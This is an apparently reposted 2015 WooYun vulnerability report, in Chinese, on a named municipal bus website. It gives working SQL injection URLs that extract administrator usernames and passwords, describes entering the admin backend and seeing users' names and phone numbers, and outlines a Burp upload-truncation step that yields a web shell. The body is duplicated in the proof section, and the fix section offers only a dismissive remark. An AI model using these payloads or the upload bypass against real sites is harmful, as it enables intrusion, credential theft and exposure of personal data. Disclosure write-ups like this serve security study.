记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

某市公交网getshell(后台泄露信息&管理公交站点)

2015-01-01 12:50

自贡市公交网:http://www.zgbus.net/

多处存在注入,这里就以http://www.zgbus.net/news_fw.php?typeid=4为例

丢进sqlmap中把库名,表名,列名都跑出来了,就是跑不出来账号密码!!

1.jpg



没有办法,只有手工了,还好只差账号密码,不用花太多时间!

http://www.zgbus.net/news_fw.php?typeid=4 order by 10--正常11报错

所以http://www.zgbus.net/news_fw.php?typeid=4%20union%20select%201,admin_user,3,4,5,6,7,8,9,10 from admin_manage



得到相应的账号

http://www.zgbus.net/news_fw.php?typeid=4%20union%20select%201,admin_pwd,3,4,5,6,7,8,9,10 from admin_manage

得到对应的密码



利用超级管理员进入后台



2.jpg





管理路线,站点。会员管理这些



互动信息管理,泄露用户名和手机号

3.jpg







好了,在添加信息处可以上传图片

burp截断

4.png





5.jpg



我们可以看见已经成功上传了

6.jpg





话说从来没走过首页,这次是否上个首页哇?

http://www.zgbus.net/wooyun.txt

漏洞证明:

自贡市公交网:http://www.zgbus.net/

多处存在注入,这里就以http://www.zgbus.net/news_fw.php?typeid=4为例

丢进sqlmap中把库名,表名,列名都跑出来了,就是跑不出来账号密码!!

1.jpg



没有办法,只有手工了,还好只差账号密码,不用花太多时间!

http://www.zgbus.net/news_fw.php?typeid=4 order by 10--正常11报错

所以http://www.zgbus.net/news_fw.php?typeid=4%20union%20select%201,admin_user,3,4,5,6,7,8,9,10 from admin_manage



得到相应的账号

http://www.zgbus.net/news_fw.php?typeid=4%20union%20select%201,admin_pwd,3,4,5,6,7,8,9,10 from admin_manage

得到对应的密码



利用超级管理员进入后台



2.jpg





管理路线,站点。会员管理这些



互动信息管理,泄露用户名和手机号

3.jpg







好了,在添加信息处可以上传图片

burp截断

4.png





5.jpg



我们可以看见已经成功上传了

6.jpg





话说从来没走过首页,这次是否上个首页哇?

http://www.zgbus.net/wooyun.txt

修复方案:

你们懂

知识来源: www.wooyun.org/bugs/wooyun-2015-083450

阅读:102221 | 评论:0 | 标签:无

想收藏或者和大家分享这篇好文章→复制链接地址

“某市公交网getshell(后台泄露信息&管理公交站点)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云